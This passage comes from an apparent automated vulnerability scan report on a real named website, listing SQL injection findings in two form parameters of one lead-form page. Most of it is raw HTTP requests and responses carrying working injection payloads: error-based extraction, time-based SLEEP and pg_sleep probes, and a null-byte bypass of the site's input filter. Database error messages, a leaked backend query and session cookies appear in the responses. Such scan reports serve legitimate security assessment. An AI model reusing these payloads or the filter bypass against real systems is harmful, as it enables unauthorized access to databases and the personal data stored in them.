HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:43:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'do not accept Visa or Mastercard&attributeId_529=3407__ $0 - $5,000&button3=Subm' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes''&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:43:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.44. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_438 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_438 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_438 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard'&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:23:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
card'&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email' at line 5

1.45. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_438 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_438 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_438 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard'&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:43:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '$0 - $5,000&button3=Submit&companyname='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard''&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:43:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.46. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_529 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_529 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_529 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000'&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:51:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9174


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
R(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000''&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:51:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.47. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_529 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_529 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_529 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000%00'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=udli5ng4ft1qutifrim44ub5t1; JSESSIONID=3938ED843130D7AF1696C93CADE0B10E; OAID=029085b33b46dc8b68c77befe6006461
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:00:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8350


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ercard&attributeId_529=3407__ $0 - $5,000.'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000%00''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=udli5ng4ft1qutifrim44ub5t1; JSESSIONID=3938ED843130D7AF1696C93CADE0B10E; OAID=029085b33b46dc8b68c77befe6006461
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:00:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.48. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_529 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_529 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_529 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:23:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
